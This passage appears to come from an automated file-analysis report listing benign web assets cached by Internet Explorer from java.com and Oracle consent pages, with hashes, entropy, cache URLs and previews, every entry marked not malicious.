Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS4 Macintosh.2011:01:25 18:25:40......................................_...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..V....ljo.l7.k..............;.......[&..z..u{.{...m....c}...8.5.2....<msK..P..2.;k.c.7......}U. H......2........{..A7.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\layout[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	69
Entropy (8bit):	4.2053905817469905
Encrypted:	false
SSDEEP:	3:uGK4bqf6FGs/:vf
MD5:	31E65444B9EF22C90B0CB11A27F64863
SHA1:	D2AFF3063580CD697754584D923972FBDCFABE7A
SHA-256:	EE8A71FAFB65F44BF73C699B1C21F8C49B9FB176700FC2807D36413E5BF8A13B
SHA-512:	8FC0836155CD0B01BB7002C512DFD3661605676BC3F06C5837295715EC6343821CB30CF4955B0EAD8944BB140B461DC61623685229726BD2C42AA6B14308BDC3
Malicious:	false
IE Cache URL:	https://www.java.com/_compdelivery/_cache_2094/JCOM-Footer_Detail/assets/layout.html
Preview:	<div class="jvf0">. {{#fields}}. {{{body}}}. {{/fields}}.</div>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\print[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	804
Entropy (8bit):	5.112445136333023
Encrypted:	false
SSDEEP:	12:+qAyjfRR4ZN3A7JCHWX3d+yFrYaOzekBBsuDJ/cOYuOYgIWxnoDmZ2aLAob:FreBYJCm3RZI+YbEZ0aJ
MD5:	4F4FA7F6D2D8B440E06729E428EF16B1
SHA1:	B20A0C9A0FF94FA896ABEEEF26033291EAB959A9
SHA-256:	852B5C251CE5A304159750A6493E562C2E30AEC62C47C9549AD9B7D3D4D2CAE6
SHA-512:	A645D8DB979033C4E84E7066B5F8BB9791FC90942B8E3D4347928B85E7FFFA4DAD376CC7F2AC2F8CDBD7F6D32F60BF4502A35DCCAEF8ED8F364F70EE3F771E38
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/css/print.css
Preview:	body{line-height:1.5;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;color:#000;background:0;font-size:10pt}.container{background:0}hr{background:#ccc;color:#ccc;width:100%;height:2px;margin:2em 0;padding:0;border:0}hr.space{background:#fff;color:#fff}h1,h2,h3,h4,h5,h6{font-family:"Helvetica Neue",Arial,"Lucida Grande",sans-serif}code{font:.9em "Courier New",Monaco,Courier,monospace}img{float:left;margin:1.5em 1.5em 1.5em 0}a img{border:0}p img.top{margin-top:0}blockquote{margin:1.5em;padding:1em;font-style:italic;font-size:.9em}.small{font-size:.9em}.large{font-size:1.1em}.quiet{color:#999}.hide{display:none}a:link,a:visited{background:transparent;font-weight:700;text-decoration:underline}a:link:after,a:visited:after{content:" (" attr(href) ") ";font-size:90%}.jvf0,.jvh0{display:none}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\require[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	17793
Entropy (8bit):	5.215395984599636
Encrypted:	false
SSDEEP:	384:6vCwvGiN5cMU8QatLePlko998VpSAIgujHrEDO11yy1qlMW2IP4VldNJ:0G7MU8qPlko998PhIg0HrEDM1yy1qlR2
MD5:	E9342BC1D3266232090154892C0637D3
SHA1:	AF6E361DC1E0EABD7AA52E8C0BBA133C60E5E388
SHA-256:	8D4B8FCEDCB0B6181A85C79254CDF85F7B97ABFCBA9DD51C93C308C9835FDEA9
SHA-512:	7B8D96A8A2F82125FBDD162A37E7B4ADAE474931F9BCDDEFAA1911D35147BBAA32CF3350C92363D1194505F7A6DDF72A961A907A6926F7EBAC7F37F9D5304D18
Malicious:	false
IE Cache URL:	https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/require.js
Preview:	/** vim: et:ts=4:sw=4:sts=4. * @license RequireJS 2.3.6 Copyright jQuery Foundation and other contributors.. * Released under MIT license, https://github.com/requirejs/requirejs/blob/master/LICENSE. /.var requirejs,require,define;(function(global,setTimeout){var req,s,head,baseElement,dataMain,src,interactiveScript,currentlyAddingScript,mainScript,subPath,version="2.3.6",commentRegExp=/\/\[\s\S]?\\/\|([^:"'=]\|^)\/\/.$/gm,cjsRequireRegExp=/[^.]\srequire\s$\s["']([^'"\s]+)["']\s*$/g,jsSuffixRegExp=/\.js$/,currDirRegExp=/^\.\//,op=Object.prototype,ostring=op.toString,hasOwn=op.hasOwnProperty,isBrowser=!("undefined"==typeof window\|\|"undefined"==typeof navigator\|\|!window.document),isWebWorker=!isBrowser&&"undefined"!=typeof importScripts,readyRegExp=isBrowser&&"PLAYSTATION 3"===navigator.platform?/^complete$/:/^(complete\|loaded)$/,defContextName="_",isOpera="undefined"!=typeof opera&&"[object Opera]"===opera.toString(),contexts={},cfg={},globalDefQueue=[],useInteractive=!1;function

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\results[1].txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	8
Entropy (8bit):	2.5
Encrypted:	false
SSDEEP:	3:x:x
MD5:	402E7A087747CB56C718BDE84651F96A
SHA1:	7CE01F6381463362CF6AEF2F843A59261E8F5587
SHA-256:	662EFAF46C617DDBCB8FF4A2A8F64CFFD3D93630F1003F8E66511F369B87730F
SHA-512:	5080D776D0B123F20E97D44472EF2343BC022105AA67FC802B71668BAEB74A81530355589D50B1142165D17EF995AEAC196B6C15136D518A1EC0ABFA13C91D10
Malicious:	false
IE Cache URL:	https://kqitits7mulnqyeucika-p323bx-53d3b3fe1-clientnsv4-s.akamaihd.net/eum/results.txt
Preview:	Success!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\10.cache[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	248479
Entropy (8bit):	5.679841116358217
Encrypted:	false
SSDEEP:	6144:T4Kg0YE59pQVZ0QfqOWIyMeTsBXnYZEq+3:T4K3pwqoOUXnYk
MD5:	C0505C29146931555F03C9B1CA33ADA8
SHA1:	C9419243DC3B06FE21B54BD41FBC4FC9AEA3A986
SHA-256:	B36941FAFF55CB4E1DB3A8DA151B535DC1F330D85AF2F6929C939176D534041F
SHA-512:	B18667E764CD16550782EDE46B80AAFA41632A0DBAC44B1EA7A54F8EB9482541D7D191C2AC9B27F7E1E256A5C0C36764F6C59C8AA72AC18CD9A29062A7826C55
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/defaultpreferencemanager/deferredjs/0D070042D9C67A68E1A4BF804E6E0E06/10.cache.js
Preview:	function Rb(){}.function Vb(){}.function up(){}.function Kp(){}.function Qp(){}.function Wp(){}.function bq(){}.function zq(){}.function Oq(){}.function er(){}.function lr(){}.function $u(){}.function oU(){}.function sU(){}.function xU(){}.function HU(){}.function oV(){}.function rV(){}.function uV(){}.function xV(){}.function vW(){}.function QW(){}.function rX(){}.function uX(){}.function BX(){}.function EX(){}.function KX(){}.function EY(){}.function HY(){}.function G_(){}.function M7(){}.function P7(){}.function wbb(){}.function lcb(){}.function ocb(){}.function Meb(){}.function efb(){}.function hfb(){}.function kfb(){}.function nfb(){}.function qfb(){}.function ufb(){}.function xfb(){}.function Vjb(){}.function Itb(){}.function zyb(){}.function Jyb(){}.function hzb(){}.function Rzb(){}.function Uzb(){}.function UOb(){}.function MOb(){}.function QOb(){}.function GMb(){}.function XNb(){}.function KPb(){}.function xQb(){}.function RSb(){}.function YSb(){}.function dTb(){}.function kTb

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\JavaGreenfoot[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	3629
Entropy (8bit):	7.847576284308009
Encrypted:	false
SSDEEP:	96:jAyzHk1IBRBpKMGLWfUOOyDFvKk2j4qm6mV9PUks4tiDY:l7fjKdyfUoDgjqXr04tiE
MD5:	D28BC5EA9F5E4C6F983F012E071B2A21
SHA1:	E76684B1DDC5D7BA3AE0BDB53C09893E1D4DA12B
SHA-256:	73599CAFDE30FB5C1FC726A0D09595C7D5E681F670661990747B3294F8EF5746
SHA-512:	4B91C49BD298EF4103D1127DA1D17EC3B75661105164D93AB5A5041192B231654BD84D4483AE24CFC82A4EFE586582EB5013A19AE24E7AA607F5882361E553F6
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONTE27F21C0DDA34CE985D9F7C9D23FC8B0/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.....d.d.....C..............................................!........."$".$.......C.........................................................................}..!........................................G..........................!.1.."QUq.346ARasu........#B..$r.2b.%S.............................................................1.!A..Qq......."2...............?...i=5R.e.....e..K.@..n..I...)....f&.r........-.`.Ot.W..0..6S.?U.%...)....f.7..{....e=.._b[.....Ot.W..0l..~..K}.X..)....f...O.}.o....e=.._b[........-.acp.Y..:....&....}Y.CB.B....$.Z..4.9..QK../N...>]...s.!...E(.N8...J..s...j.&.P...l.hR....Xis.t...#.N.t...{.ai)v_~..}...H.(%I..p..$OF#..\4F..p[....}D....u~....H..;..@...=X..Q....k..k..I.GH.f...Y....H.!.{k.....8..+..2.s.J.Z.HY.M..>Q.(......a4.L.%3.f.%.N8.7.l.`.H .e.$.4....Fys._......NSj\.s..>....;'/>.<./p.R.....}M.-#....Q,...74K<#d...H...KZ;.~..X......Ki..G.:.....OV...,.....t..j...H\|..:$.r.@..B...C.,>..d....qx.SV...N.mJ.je..i.eJ.S.5....2.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\controller[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	29779
Entropy (8bit):	5.384616840808838
Encrypted:	false
SSDEEP:	384:2tAXfo1yc8Z4n7hR0RQRRVVZxWJTSF1sR1ECaZq4kzer/JKva3M:Nbc8Z47zacVVZ8i1sReAHt
MD5:	4E7A74127C680C9953242315466999E9
SHA1:	E25BC8DA188D9D69A3A3276F4E834F871C8B2F7E
SHA-256:	E27E66F37F0DE43B16DB3E9D60D0D3E537C09E55C84D19B2E42BA63308795478
SHA-512:	3AA848EED23083121972B5F864E3402BCA05BA93CC32DC9E0AFC1A8E59B31EB55B122F5493F423EE6043F1991A8D9F4EDC29B5E22EE84157173767F0CD080D26
Malicious:	false
IE Cache URL:	https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/controller.js
Preview:	"use strict";var SCS=window.SCS\|\|{};SCS.sitePrefix=SCS.sitePrefix\|\|"/",SCS.data={pageId:null,siteInfo:null,structure:null,structurePages:null,basePageModel:null,baseSlotReuseModel:null,pageModel:null,pageLayout:null,mobileLayout:null,navMap:{},navRoot:null,placeholderContent:null,startProgressTimer:null,pageTimeoutTimer:null},SCS.performance={timers:{}},SCS.xmlhttp=new XMLHttpRequest,Array.isArray\|\|(Array.isArray=function(e){return"[object Array]"===Object.prototype.toString.call(e)}),String.prototype.trim\|\|(String.prototype.trim=function(){return this.replace(/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,"")}),String.prototype.startsWith\|\|(String.prototype.startsWith=function(e,t){return t=t\|\|0,this.substr(t,e.length)===e}),SCS.preInitRendering=SCS.preInitRendering\|\|function(){},SCS.initRendering=function(){this.data.startProgressTimer=setTimeout(this.onStartProgress,2500),this.data.pageTimeoutTimer=setTimeout(this.onPageTimeout,3e4),this.setCacheKeys(),this.processSitePrefix(),this.isPrerende

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\cookie_iframe[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	5014
Entropy (8bit):	5.070770931797894
Encrypted:	false
SSDEEP:	96:yGYYYxNFxNmFZiQ/BDZhFIgRxI/wKRpRTWukeWaTESXDAvdD9iPDJi/dDJ3DDJJ2:yGYYgNLNmSQ5FPIgHILWaTESXDAvdD9k
MD5:	1159F3467D523D0578BC6FAFEDD369EC
SHA1:	9F08758879C608D2C718071344B96CEC910499B3
SHA-256:	E5356C4D200584B116D9AC14F89D883B120DBE4D7878914A4FA22358074C74F8
SHA-512:	22DAD07905FBB2399C7E83E81FE7514C0B2AF69C384B99CB93805884AFF55B82A6A090A57CC1C3B5435760FB1659BFCBD3A4A1EAE0DB0EA3FC8FE379551698CE
Malicious:	false
IE Cache URL:	https://prefmgr-cookie.truste-svc.net/cookie_js/cookie_iframe.html?parent=https://consent-pref.trustarc.com/?type=oracle6&site=oracle.com&action=notice&country=ch&locale=en&behavior=expressed&gtm=1&layout=default_eu&irm=undefined&from=https://consent.trustarc.com/
Preview:	<html>.<body>.<script type="text/javascript">.function createCookie(name,value,days) {. if (days) {. var date = new Date();. date.setTime(date.getTime()+(30000));. var expires = "; expires="+date.toGMTString();. }. else var expires = "";. if (shouldSendSameSiteNone(navigator.userAgent)) {. document.cookie = name+"="+value+expires+"; path=/; secure; SameSite=None";. } else {. document.cookie = name+"="+value+expires+"; path=/";. }.}..function readCookie(name) {. var nameEQ = name + "=";. var ca = document.cookie.split(';');. for(var i=0;i < ca.length;i++) {. var c = ca[i];. while (c.charAt(0)==' ') c = c.substring(1,c.length);. if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);. }. return null;.}..function eraseCookie(name) {. createCookie(name,"",-1);.}..function gup( name ).{. name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");. var regexS = "[\\?&]"+name+"=([^&#]*)";.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\get[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2004
Entropy (8bit):	5.228582846237988
Encrypted:	false
SSDEEP:	48:Qd+wePCCFJw2Gb7IhVkAvm7CJQZfuPEgOpcGbpCBOxm:QdjeqCF0TAvmOJ/Bos
MD5:	EB36752D424D4B17D5C0786DA41ACF66
SHA1:	EBCE41EF9C2581EA61E5C856885008A3E88E55FD
SHA-256:	BD478D1E075F071CA0F0E7F3E27E4C22D27831B23DF86DD6D0F7A37C38263B0E
SHA-512:	E071D33A9B303113E821A3626EBF8CA0E45B0241251862C521A42C68E5ED73C75FD0F18144517569940606736733B7BD2F974791DB10167606C610A838F5A231
Malicious:	false
IE Cache URL:	https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
Preview:	<html><head><script>!function(){var e,t,a,r,n,s="truste.consent.",i=function(e){var t,a={},e=a._url=e;if(e=(a._query=e.replace(/^[^;?#][;?#]/,"")).replace(/[#;?&]+/g,"&"))for(e=e.split("&"),t=e.length;0<t--;){var r=e[t].split("="),n=r.shift();a[n]\|\|(a[n]=r.length?decodeURIComponent(r.join("=")):"")}return a}(location.href).domain;function o(e,t){var a=JSON.stringify({source:"preference_manager",message:e,data:t});top.postMessage(a,""),parent.postMessage(a,"*")}function c(e){var t=null;try{var a=self.localStorage;t=a.getItem?a.getItem(e):a[e]}catch(e){}return t&&JSON.parse(t)\|\|null}function p(e){try{var t=s+e,a=c(t);if(!a)return null;if(new Date(a.expires)<new Date)try{return self.localStorage.removeItem(t),null}catch(e){return null}return a}catch(e){}return null}function l(e,t){var a=c(e);!t.popTime&&a&&a.popTime&&(t.popTime=a.popTime);var r="string"==typeof t\|\|t instanceof String?t:JSON.stringify(t);try{var n=self.localStorage;n.setItem?n.setItem(e,r):n[e]=r}catch(e){}}void 0!==i&&o

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\items[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	7214
Entropy (8bit):	5.647875097933699
Encrypted:	false
SSDEEP:	192:9q0XkZ4JddBzuclksHEqpK5lf35hS5hf5hO5h4Y:g0xJddtFlksHEWK5lf3PSPfPOP4Y
MD5:	DE149FC4558B3C853E30AABCE0DC7F56
SHA1:	2F7B55A7D6F62F63CF2760B93FFCA5BE04F373BB
SHA-256:	8C9344A56407F0903D36DC274EBBD3D33D7014DB50BE118687F5F2D21661A6D7
SHA-512:	89CA9A98A46A7D19057D43E50E6A2BF4B6D8826C708BF643031D2997822FB63913F257763EBCFA297B12D39A5DDA53947264362E93B17E7EF42524427B17C3B6
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/items?q=((id%20eq%20"COREEACA6644ABED46228A54322C5E14161D"%20or%20id%20eq%20"CORE1CE64AD7F2E944B68F223DEBB0AF616A")%20and%20(language%20eq%20"en"))&channelToken=1f7d2611846d4457b213dfc9048724dc&cb=_cache_97bc
Preview:	{"hasMore":false,"offset":0,"count":2,"limit":2,"items":[{"translatable":true,"createdDate":{"value":"2020-05-18T21:48:54.443Z","timezone":"UTC"},"name":"Home content","description":"","language":"en","links":[{"href":"https://orasites-prodapp.cec.ocp.oraclecloud.com/content/published/api/v1.1/items/COREEACA6644ABED46228A54322C5E14161D","rel":"self","method":"GET","mediaType":"application/json"}],"id":"COREEACA6644ABED46228A54322C5E14161D","updatedDate":{"value":"2021-04-22T20:08:16.263Z","timezone":"UTC"},"type":"JCOM_SimplePage","fields":{"omniture":null,"keywords":["java","downloads","software","java runtime","jre","java download","download java"],"Webreference":null,"addBodyTags":" Begin SiteCatalyst code version: G.5. --> <script language=\"JavaScript\" type=\"text/javascript\"> var s_channel = \"javac:Home\"; var s_pageName = \"javac:Homepage\"; var s_prop19 = \"en_javac:Homepage\"; var s_prop20 = \"Home_Pages\"; // var s_prop21 = \"180X150-728X90\"; var s_prop21 = \"180X

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\javamagazine(2)[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	4226
Entropy (8bit):	7.880591113615801
Encrypted:	false
SSDEEP:	96:VBzQCZdNH3huPYdVNsFNCfBuJcNYK9nnp0V2+TITq:NZdNhuPYthTNYKATIW
MD5:	2EFF9C6E995AD134C885B4BB0132891B
SHA1:	35C7E3F315107B38E1E2179B432F5D4EBCCC7EB0
SHA-256:	4C9A37DE6893B18623F4F0F5D8BD03767CD01CCCD23BD5A0F671B888520975D8
SHA-512:	6E5140429C7C964B2405572044B39BE1154AC5191EFECE2CE9A386B05EA2BB1076A4A2F41C5993BB58C6FFCB6A5025AE5483F9EB24ED1469E14FA2E4F39A6890
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONT7D6EB42C70A34F858C8582494B5B021E/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.............C..............................................!........."$".$.......C.........................................................................}..!........................................J..........................!..1..AQa.."2RUq...#BS.......Tcr...$34bt.%Ds.................................1........................!.1Q...3Abq..."2a...4..............?..&;..J..K.0.[m.....YY$...It..+.....x..h..Q.L......te......=.U{..BxK....[....S..a..{...ov..;.U{..A.\|\..\|...\.U.2......:..e...A.r...s.....:..e....\..U.....A.r...s..T..U.2......>..e..........s.....:..e....S.}W..{.....:....[v.....-.....}....Se..P.8.M.......:M;76.*.y.v...K....w..A..50..01.....%..alu....mx.-..[^.,z...A...0...l.D........e.7!.....+..p.k..G.....okh.Sw.}..J.Y.i..J.QU..s.;....X...O..^KO..}.....i_hb...G...6..0rZ..+....-....\|.....Z......N,..I....3.......d....e..a.s.a.e..P0nOQ.!....9.<~.o..8FE......rM.7......?.+...#-Z.......r+).Sq.v.mY..fbiUba..C...<IP.I.../0..H.j z.1.`.K.&e.%.y

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\jv0_search_btn[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 19 x 18
Category:	downloaded
Size (bytes):	99
Entropy (8bit):	5.689180797659173
Encrypted:	false
SSDEEP:	3:Clp6Wnta/CSxlOnRFSLUA6wZzzjgPQ2/rnle:Up9oaSjIOLUOjgPxrle
MD5:	6B63F7479D5FDCF11F57F1315339A071
SHA1:	0552EA5365B2C87B850DB6974645F0D81FBD22F8
SHA-256:	AC0AFC4A38CF993FF8048D40E16725EC2C5A59737E68A4DC741A8EDD6A7D3384
SHA-512:	CD875B3E9F87D9BB13784AEFAF9B155603C7A9E32008CEB7DE69DBF78A15D0EC3BE3664ABB1ACF82227D42DFF0BFEF0DBB9FE46E71F1348C164F6D4E5F6A7E8D
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/header/jv0_search_btn.gif
Preview:	GIF89a...................!.......,..........4..h...HX1....=.L...xP.....R&...u+....f.I*...(Af....;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\jv0dl_a[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 672 x 128, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	4741
Entropy (8bit):	7.853820287173857
Encrypted:	false
SSDEEP:	96:ySDZ/I09Da01l+gmkyTt6Hk8nTKwD1IBxaf/76744xn+LGDDTmIiQceDrr7k:ySDS0tKg9E05TlD1Uwf/76744oyaIvf0
MD5:	A6BE3E959427A5B5645356CBE0DFCF51
SHA1:	818B4E71DACA0CA889B0714935A159E91C2F1B25
SHA-256:	EEC8393557E19987E71F13592A34E39119CA17F5AC554974B937B437AA7DDC58
SHA-512:	D7C9467FE6DDE7CA9B93F266F10BB0591B23F0E518BD35251A8DB08E33C3F43A9A5BBC0BDE8AD677E657A45352076D24FF789D0272B6001385EB37B158F91554
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/home/jv0dl_a.png
Preview:	.PNG........IHDR.............[mL.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+.....x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D...A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\jv0ht[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 351 x 173
Category:	downloaded
Size (bytes):	5672
Entropy (8bit):	7.931442402707422
Encrypted:	false
SSDEEP:	96:7V+XRRyaia6m3ZU9jfmZBDvseok66dOxoGElY8DXQBDk8V0SBqOT3QZgJn9o:7CRxia6+U9jfmXYefFcxoGUhQ68V0OwX
MD5:	59AA1CA709F752690212C4E0039B0E4F
SHA1:	BEB6644DF8190D7AF1F3DC1DCB4857AB4AEA74C7
SHA-256:	26070A72AE2C336CE985EA6650D78B61304F75265087DDC7144FB407661637B0
SHA-512:	89A2BA004CEFBBC56F19FD4FFBB8BA02DDA9E1063146101DC418436BFA1396FD28D5E7D3884E9A0D762CAFD1831690A5A96D77CF0EF52AD9FA53C4FE82F7C01D
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/home/jv0ht.gif
Preview:	GIF89a_......ddd...........nnn...yyy......................!.......,...._...@....I..8...`(.dirD..g...(..s.....@.xn..n....h.I............Hsp.3..Y.n..k..:.ZA..q9rw.u8n.PR...d....lM.@.T.@.]E-p..4gvxe.....H..hs.}.f$Q.......S'._....Z4...j&....K@...W....z..........!..n.4....@$.<..L..@.%.{..ijD..?....+g...e"...S..)Y.. (.......,.@r......\....!...p...0..0.Y.&.`#B..J...H..8.B.o.l.u...TT.D.X'."D..f=...H.sB.Y.. .....xzu.T.t[.r{.@#.gK.-..B2.d....".3{lp.0.f....O......3....+.....^...X.,...M.(..+...TCf.3J.6.D..L.....j..%<sBW..9....M.......p\.........9.74.n.y...K .ha7.......YID..r.%..1........s".G.f3.XA,.!........!.e..}]T...0..E!...<.c[.&...u..W..,^....Y..y%..".....PF).TVi.Xf.e.3..ep..!....`...\..g0}y.....cxI.c..d..[.i...`H.....A..A....H....\....D.....iY.t..!.=....N...q.ZI..H..W...%.j..\|...i...........x...&......C.4.RP..... .%..W.......*+.y..`.4..$[..............b.K..`.-...;...r.n.}m..bp0R.QA.`z...b.A.h.i....+....zq#...2.....r.0...DE...T.G.."ln#.n".~.+b2.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\render[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	exported SGML document, UTF-8 Unicode text
Category:	downloaded
Size (bytes):	3922
Entropy (8bit):	5.033296563341562
Encrypted:	false
SSDEEP:	96:vb2Lm3CaOFVyvB4Ex0+m0YyMPt7xAQ5MiQwbGBOb7cDDts6J:TN4c9rEF7xqwbG4b7cftsq
MD5:	1E621F239F2EF351D86D5E41C75126EF
SHA1:	FBA636F058780CD43C981DFAB65BCF40499D5C26
SHA-256:	86AC00A8DCFBEC6B2013EEA74A851C1FBC8FE6BB128F746293744A9DE7162196
SHA-512:	475432796F0CFE3219E525DEECF5825284E328C492715CE5A322272E99EF5A4090E4FD83E02FE7FD2B01248770C2692E265C58279B0E6611B8FD79328995C543
Malicious:	false
IE Cache URL:	https://www.java.com/_compdelivery/_cache_2094/JCOM-Footer_Detail/assets/render.js
Preview:	/*. Copyright (c) 2019 Oracle and/or its affiliates. All rights reserved.. * Licensed under the Universal Permissive License v 1.0 as shown at http://oss.oracle.com/licenses/upl.. /./ globals define,console */.define([.."jquery",.."mustache",.."marked",.."text!./layout.html".], function ($, Mustache, Marked, templateHtml) {.."use strict";...// Content Layout constructor function...function ContentLayout(params) {...this.contentItemData = params.contentItemData \|\| {};...this.scsData = params.scsData;...this.contentClient = params.contentClient;..}...// Helper function to format a date field by locale...function dateToMDY(date) {...if (!date) {....return "";...}....var dateObj = new Date(date);....var options = {....year: "numeric",....month: "long",....day: "numeric",....hour: "2-digit",....minute: "2-digit"...};...var formattedDate = dateObj.toLocaleDateString("en-US", options);....return formattedDate;..}...// Helper function to parse markdown text...function parseMarkdown(mdText

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\results[1].txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	8
Entropy (8bit):	2.5
Encrypted:	false
SSDEEP:	3:x:x
MD5:	402E7A087747CB56C718BDE84651F96A
SHA1:	7CE01F6381463362CF6AEF2F843A59261E8F5587
SHA-256:	662EFAF46C617DDBCB8FF4A2A8F64CFFD3D93630F1003F8E66511F369B87730F
SHA-512:	5080D776D0B123F20E97D44472EF2343BC022105AA67FC802B71668BAEB74A81530355589D50B1142165D17EF995AEAC196B6C15136D518A1EC0ABFA13C91D10
Malicious:	false
IE Cache URL:	https://84-17-52-78_s-23-32-238-155_ts-1620316692-clienttons-s.akamaihd.net/eum/results.txt
Preview:	Success!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\screen[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	20825
Entropy (8bit):	4.994143793467963
Encrypted:	false
SSDEEP:	384:UoURDmGjjKJzOh+7V6iKFd7FAtDHFxQFW23:WiGj+zOI7Vq7FAlFSFV3
MD5:	A74B0D2CD7E657A5CB55B9BC1B6985C3
